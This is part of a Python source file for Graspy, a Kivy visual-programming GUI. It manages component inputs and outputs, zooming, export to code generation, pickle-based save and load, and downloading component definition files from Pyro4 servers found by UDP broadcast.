        new_tab.text = category_name
        components_box = self.make_components_box(category_name)
        new_scroll = ScrollView()
        new_scroll.add_widget(components_box)
        new_tab.add_widget(new_scroll)
        components_categories.add_widget(new_tab, index + 1)
    def input_pressed(self, input):
        """Select *input* for editing and refresh the description/value panel."""
        self.current_input = input
        self.ids.input_description.text = 'Description:\n' + input.description
        self.ids.input_value.text = 'Value:\n' + str(input.value)
        self.input_list = input.type == 'list'
        if self.user_selected:
            if input.type == 'list':
                self.ids.open_outputs_button.text = self.ids.open_outputs_button.input_text
                self.populate_input_values_list()
            else:
                self.ids.open_outputs_button.text = ''
        else:
            self.ids.open_outputs_button.text = self.ids.open_outputs_button.output_text
    def populate_input_values_list(self):
        """Fill the outputs list with the allowed values of the current input."""
        values_list = [value for value in [input.type_values for input in self.current_component.inputs
                                          if input.label == self.current_input.label].__getitem__(0)]
        try:
            self.ids.outputs_list.clear_widgets()
            for value in values_list:
                btn = Button(text=str(value), size_hint_y=None, height=44)
                btn.bind(on_release=self.input_value_pressed)
                self.ids.outputs_list.add_widget(btn)
        except ReferenceError:
            pass
    @staticmethod
    def delete_files_from_folder(folder):
        """Delete every file and subdirectory directly under *folder*."""
        for the_file in os.listdir(folder):
            file_path = os.path.join(folder, the_file)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
                elif os.path.isdir(file_path):
                    shutil.rmtree(file_path)
            except Exception as e:
                print(e)
    def process_components_path(self, components_path):
        """Parse every .comp file in *components_path*, register the parsed
        components by category and write an aliasing 'components_str' file."""
        components_str = ''
        for file in glob.glob(components_path + sep + "*.comp"):
            component = process_component(file)
            components_str += component.component_name + ' = ' +\
                              component.object_name + '.' + component.component_name + '\n'
            # print(component)
            self.components_list.append(component)
            if component.component_category not in categories_components_dict.keys():
                categories_components_dict[component.component_category] = []
            categories_components_dict[component.component_category].append(
                (component.component_label, component.component_name))
        with open(components_path + sep + 'components_str', 'w') as f:
            f.write(components_str)
    def build_categories(self):
        """Load components from both component folders and create one tab per
        category (sorted alphabetically)."""
        for components_path in [comp_files_path, flow_control_components_path]:
            self.process_components_path(components_path)
        for index, category_name in enumerate(sorted(categories_components_dict.keys())):
            self.make_new_category(category_name, index)
    def populate_inputs_list(self, widget):
        """Rebuild the inputs panel from *widget*'s inputs."""
        self.ids.inputs_list.clear_widgets()
        print(widget.id)
        try:
            for input in widget.inputs:
                but = InputButton(text=input.label)
                but.name = input.name
                but.label = input.label
                but.description = input.description
                but.value = input.value
                but.type = input.type
                print(input.value)
                but.bind(on_release=self.input_pressed)
                self.ids.inputs_list.add_widget(but)
        except AttributeError:
            pass
    def populate_outputs_list(self, my_widget):
        """Rebuild the outputs panel from *my_widget*'s outputs."""
        self.ids.outputs_list.clear_widgets()
        self.ids.selected_output.text = 'select output'
        for output in my_widget.outputs_list:
            btn = OutputButton(text=output)
            btn.bind(on_release=self.output_value_pressed)
            self.ids.outputs_list.add_widget(btn)
    def output_value_pressed(self, output_button):
        """Wire the chosen output of the current output component into the
        input being edited."""
        self.ids.outputs_list.select(output_button.text)
        print('object: ', output_button.text)
        self.ids.selected_output.text = str(output_button.text)
        text = 'component: ' + self.current_output_component.name + ' ' + \
               str(self.current_output_component.index_number) + '\noutput: ' + str(output_button.text)
        self.change_input_value(text)
        self.ids.input_value.text = 'Value:\n' + text
        self.from_user_pressed(True)
    def input_value_pressed(self, input_value_button):
        """Set the current input to one of its allowed list values."""
        self.ids.outputs_list.select(input_value_button.text)
        self.change_input_value(input_value_button.text)
        print(input_value_button.text)
        self.ids.input_value.text = 'Value:\n' + input_value_button.text
    def output_selected(self, instance):
        """Show *instance* as the selected output label."""
        self.ids.selected_output.text = instance
    def from_user_pressed(self, state):
        """Toggle between 'value from user' (state=True) and 'value from
        component' modes, updating the toggle buttons and value list."""
        self.user_selected = state
        self.ids.outputs_list.clear_widgets()
        if state:
            self.ids.from_user.state = 'down'
            self.ids.from_component.state = 'normal'
            self.ids.selected_output.text = ''
            if self.current_input.type == 'list':
                self.populate_input_values_list()
                self.ids.open_outputs_button.text = self.ids.open_outputs_button.input_text
            else:
                self.ids.open_outputs_button.text = ''
        else:
            self.ids.open_outputs_button.text = self.ids.open_outputs_button.output_text
            self.ids.from_component.state = 'down'
            self.ids.from_user.state = 'normal'
    def from_component_pressed(self):
        """Switch to 'value from component' mode."""
        self.from_user_pressed(False)
        self.ids.outputs_list.clear_widgets()
        self.ids.selected_output.text = 'select component'
    def from_file_pressed(self):
        """Pick a file via a Tk dialog and use its path as the input value."""
        self.user_selected = False
        self.ids.from_component.state = 'normal'
        self.ids.from_user.state = 'normal'
        self.ids.from_file.state = 'down'
        self.ids.outputs_list.clear_widgets()
        self.ids.selected_output.text = 'select file'
        root = tk.Tk()
        root.withdraw()
        file_path = filedialog.askopenfilename()
        self.user_selected = True
        self.ids.from_component.state = 'normal'
        self.ids.from_user.state = 'down'
        self.ids.from_file.state = 'normal'
        if len(file_path) == 0:
            print('empty path')
            return
        print(file_path)
        self.ids.input_value.text = file_path_text + file_path
        self.change_input_value(file_path_text + file_path)
    def set_values_to_default(self):
        """Reset the value/description labels to their default texts."""
        self.ids.input_value.text = self.ids.input_value.default_text
        self.ids.input_description.text = self.ids.input_description.default_text
    def change_input_value(self, text):
        """Store *text* as the value of the currently selected input of the
        currently selected component, then refresh the inputs panel."""
        # for comp_widget in self.ids.main_canvas.children:
        #     if not (comp_widget.id == 'start_button' or comp_widget.id is None):
        #         if comp_widget.index_number == self.current_comp_id_number:
        #             current_widget = comp_widget
        #             break
        # component_inputs = [comp.inputs for comp in self.components_list if
        #                     comp.component_name == current_widget.name].__getitem__(0)
        try:
            for input in self.current_component.inputs:
                if input.label == self.current_input.label:
                    input.value = text
                    break
            self.populate_inputs_list(self.current_component)
        except:
            self.ids.input_value.text = 'Error!'
    def on_enter(self, text):
        """Handle Enter in the free-text input: commit *text* as the value."""
        print('User pressed enter in', text)
        self.ids.input_value.text = 'Value:\n' + text
        self.change_input_value(text)
        self.ids.user_text_input.text = ''
    def return_component_line(self, value):
        """Translate a stored "component: <label> <idx>\\noutput: <name>" value
        into the tuple used in the exported program line: ('__variable__',
        <value>) for variable components, otherwise (real_name, index,
        output_index) as strings."""
        # self.current_component.name + ' ' + str(self.current_component.index_number)
        #
        # str(output_button.text)
        value_parts = value.split('\noutput: ')
        comp_label, index = value_parts[0].replace('component: ', '').strip().split(' ')
        output_name = value_parts[1].strip()
        output_index = -1
        Break = False
        for widget in self.ids.main_canvas.children[::-1]:
            if isinstance(widget, CenterComponent):
                if widget.name == comp_label and widget.index_number == int(index):
                    comp_name = widget.real_name
                    for tmp_index, output in enumerate(widget.outputs_list):
                        if output_name == output:
                            output_index = tmp_index
                            Break = True
                            break
            if Break:
                break
        index = int(index)
        if comp_name == 'variable':
            return '__variable__', str(widget.inputs[0].value)
        return comp_name, str(index), str(output_index)
    def do_unzoom(self):
        """Zoom out: scale all placed components down by zoom_factor."""
        global g_zoom_level
        g_zoom_level *= zoom_factor
        for widget in self.ids.main_canvas.children[::-1]:
            if isinstance(widget, CenterComponent):
                widget.unzoom_level = g_zoom_level
                widget.do_layout()
        self.ids.main_canvas.canvas.ask_update()
    def do_zoom(self):
        """Zoom in: scale all placed components up by zoom_factor."""
        global g_zoom_level
        g_zoom_level /= zoom_factor
        for widget in self.ids.main_canvas.children[::-1]:
            if isinstance(widget, CenterComponent):
                widget.unzoom_level = g_zoom_level
                widget.do_layout()
        self.ids.main_canvas.canvas.ask_update()
    def run_pressed(self):
        """Serialize the canvas into GUI_output.txt (one tab-separated line
        per component) and hand it to GUI_to_code.main()."""
        with io.open(GUI_output_path, "w", encoding="utf-8") as GUI_output:
            print('==================')
            for widget in self.ids.main_canvas.children[::-1]:
                if isinstance(widget, CenterComponent):
                    prefix = 'component' + line_components_separator
                    index_number = line_components_separator + str(widget.index_number)
                    if widget.real_name in special_comps_list:
                        prefix = ''
                        index_number = ''
                    line = prefix + widget.real_name + index_number
                    for input in widget.inputs:
                        tmp_value = input.value
                        try:
                            if input.value.startswith('component: '):
                                tmp_value = '$'.join(self.return_component_line(input.value))
                        except AttributeError:
                            pass
                        line = line + line_components_separator + str(tmp_value)
                    line += line_components_separator + 'parallel_state ' + str(widget.parallel_state)
                    print(line)
                    line += '\n'
                    GUI_output.write(line)
        # GUI_output.write(line)
        # GUI_output.close()
        print('GUI_to_code main call')
        GUI_to_code.main(GUI_output_path)
        # os.system(python_command + ' "' + GUI_to_code_path + '"')
        print('==================')
    def save_file(self, save_comps_path):
        """Pickle the canvas state (id counter followed by one attribute dict
        per placed component) to *save_comps_path*."""
        list_to_dump = [self.current_comp_id_number]
        for widget in self.ids.main_canvas.children[::-1]:
            if isinstance(widget, CenterComponent):
                tmp_dict = dict()
                for attribute in attributes_to_copy:
                    try:
                        tmp_dict[attribute] = widget.__getattribute__(attribute)
                    except AttributeError:
                        print('Error found!')
                        pass
                list_to_dump.append(tmp_dict)
        try:
            pickle.dump(list_to_dump, open(save_comps_path, 'wb'))
        except FileNotFoundError:
            pass
    def change_index_of_outputs(self, component, add_index):
        """Shift every "component: <label> <idx>" reference in *component*'s
        inputs by *add_index* (used when merging a loaded file)."""
        new_inputs_list = []
        for input in component.inputs:
            try:
                if input.value.startswith('component: '):
                    value_parts = input.value.split('\noutput: ')
                    # NOTE(review): value_parts[0] still carries the
                    # 'component: ' prefix, so this 2-way unpack of a
                    # 3-token split looks like it would raise ValueError
                    # — verify against real saved files.
                    comp_label, index = value_parts[0].split(' ')
                    index = int(index)
                    index += add_index
                    value_parts[0] = ' '.join([comp_label, str(index)])
                    input.value = '\noutput: '.join(value_parts)
            except AttributeError:
                pass
            new_inputs_list.append(input)
        component.inputs = new_inputs_list
        return component
    def load_file(self, load_comps_path):
        """Unpickle a saved canvas and append its components to the current
        canvas, re-indexing their output references."""
        try:
            list_from_dump = pickle.load(open(load_comps_path, "rb"))
            self.current_comp_id_number = max(self.current_comp_id_number, list_from_dump.pop(0))
            max_index = 0
            for widget_dict in list_from_dump:
                m_canvas = self.ids.main_canvas
                but = CenterComponent()
                but.bind(on_release=self.center_component_pressed)
                for name, value in widget_dict.items():
                    but.__setattr__(name, value)
                    print(name, value)
                but = self.change_index_of_outputs(but, self.current_comp_id_number)
                but.index_number += self.current_comp_id_number
                max_index = max(max_index, but.index_number)
                m_canvas.add_widget(but, self.selected_index)
                but.remove_component = self.remove_component
                but.ids.do_parallel.text = but.parallel_state_text()
            self.current_comp_id_number = max_index + 1
        except FileNotFoundError:
            pass
    def show_save(self):
        """Ask for a target path with a Tk save dialog and save the canvas."""
        root = tk.Tk()
        root.withdraw()
        myFormats = [('Graspy files', '*.grp'), ('Any file', '*')]
        file_path = filedialog.asksaveasfilename(filetypes=myFormats)
        #file_path = wx_save_as_dialog()
        if file_path == None:
            return
        file_path += '.grp' if not file_path.endswith('.grp') else ''
        print(file_path)
        self.save_file(file_path)
    def show_load(self):
        """Ask for a source path with a Tk open dialog and load the canvas."""
        root = tk.Tk()
        root.withdraw()
        myFormats = [('Graspy files', '*.grp'), ('Any file', '*')]
        file_path = filedialog.askopenfilename(filetypes=myFormats)
        #file_path = wx_open_dialog('*.grp')
        if file_path == None:
            return
        print(file_path)
        self.load_file(file_path)
class GUI_mainApp(App):
    """Kivy application entry point; builds the MainScreen root widget."""
    def build(self):
        self.title = program_name
        return MainScreen()
def components_from_object(object):
    """Fetch component definition files from a remote Pyro object and write
    them into comp_files_path.

    The remote payload is a single string containing multiple files: each
    file is introduced by a "component_filename:<name>" line and terminated
    by a "====" separator line; everything in between is the file body.
    """
    print(type(object))
    files_str = object.get_component_files()
    print(files_str)
    files_separator = "===="
    files_lines = files_str.split("\n")
    # FIX: initialize the accumulator so a malformed payload whose separator
    # precedes any filename line cannot raise NameError.
    file_str = ""
    filepath = None
    for line in files_lines:
        stripped = line.strip()
        if "component_filename" in stripped:
            file_str = ""
            filename = stripped.split(":")[1]
            filepath = os.path.join(comp_files_path, filename)
        elif stripped == files_separator:
            # Drop the trailing blank element left by the accumulating "\n".
            body = "\n".join(file_str.split("\n")[:-1])
            # FIX: use a context manager so the file handle is always closed.
            with open(filepath, "w") as fout:
                fout.write(body)
            file_str = ""
        elif stripped == "":
            continue
        else:
            file_str += line + "\n"
def update_objects_uris(objects_uris_path, port):
    """Listen for UDP broadcast announcements for seconds_to_listen seconds
    and persist the discovered object URIs (one per line) to
    *objects_uris_path*.

    Each announcement starts with the MAGIC prefix followed by the URI;
    the announcing object is told to stop broadcasting once heard.
    """
    s = socket(AF_INET, SOCK_DGRAM)  # UDP socket for broadcast announcements
    try:
        s.bind(('', port))
        s.settimeout(4.0)
        uris_set = set()
        start_time = time.time()
        while (time.time() - start_time) < seconds_to_listen:
            try:
                data, addr = s.recvfrom(1024)  # wait for a packet
            except OSError:
                # Timeout (or transient socket error) — keep listening.
                continue
            if data.startswith(bytes(MAGIC, 'utf8')):
                tmp_uri = bytes.decode(data[len(MAGIC):]).strip()
                short_uri = tmp_uri.strip().split('$$')[1]
                tmp_object = Pyro4.Proxy(short_uri)
                tmp_object.stop_broadcast()
                uris_set.add(tmp_uri)
                print("got service announcement from", data[len(MAGIC):])
    finally:
        # FIX: the socket was previously never closed.
        s.close()
    if len(uris_set) > 0:
        string_to_write = '\n'.join(uris_set)
        print(string_to_write)
        with open(objects_uris_path, 'w') as f:
            f.write(string_to_write)
def retrieve_comp_files():
    """Discover live component servers via UDP broadcast and download their
    .comp files into comp_files_path (clearing the folder first)."""
    broadcast_port = GUI_to_code.find_port(broadcast_port_label)
    print(broadcast_port)
    print(broadcast_port_label)
    MainScreen.delete_files_from_folder(comp_files_path)
    update_objects_uris(objects_uris_path, broadcast_port)
    # FIX: use a context manager so the URI file is always closed.
    with open(objects_uris_path, encoding='utf8') as objects_uris_file:
        for line in objects_uris_file:
            uri = line.strip().split('$$')[1]
            object = Pyro4.Proxy(uri)
            components_from_object(object)
if __name__ == '__main__':
    # Hide the root Tk window; only the yes/no message box is needed.
    root = tk.Tk()
    root.withdraw()
    response = messagebox.askyesno("Update components", "Would you like to update component files?")
    # #response = wx_yes_no_dialog("Would you like to update component files?", "Update components")
    if response:
        retrieve_comp_files()
    GUI_mainApp().run()
| dkatsios/Graspy | User/GUI_main.py | GUI_main.py | py | 27,302 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.